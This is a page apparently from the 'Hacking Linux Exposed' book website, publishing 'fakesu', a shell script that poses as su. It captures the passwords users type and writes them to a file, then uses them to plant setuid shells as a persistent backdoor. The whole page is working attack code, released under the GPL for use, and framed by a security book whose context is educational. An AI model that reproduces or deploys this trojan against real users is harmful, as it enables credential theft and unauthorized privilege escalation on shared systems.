Hacking Linux Exposed

About
Authors
Contents
Reviews
Foreword
Purchase

Articles
Books
Sourcecode
Tools
Errata

Home

 


(view this code in a separate window) 

#!/bin/sh
#
# fakesu
#
# Put this file in a directory early in your PATH
# and convince someone to run su from your account.
#
# Copyright 2002, Bri Hatch
#
# Released under the GPL.  See COPYING file
# for more information.


SHELLS=/home/cracker/shells/
PWLIST=$SHELLS/passwords

username=$1

# Snag password, store in $PWLIST
if ! `grep "^$username:" $PWLIST >/dev/null` ; then

	echo -n "Password: "
	stty echo
	read password
	stty echo
	echo
	echo "/bin/su: incorrect password"
	echo "$username:$password" >> $PWLIST

# make suid shell by invoking actual su program with -c arg
elif [ ! -e $username ] ; then

	/bin/su $username -c "cp $SHELLS/shell $SHELLS/$username;
		chmod 4755 $SHELLS/$username"
	echo "/bin/su: incorrect password"
else

	# We have the password and a suid shell already - run real su
	/bin/su $username

	# They've left su, let's kill ourselves so they can't
	# muck with our id.
	kill $PPID $$
fi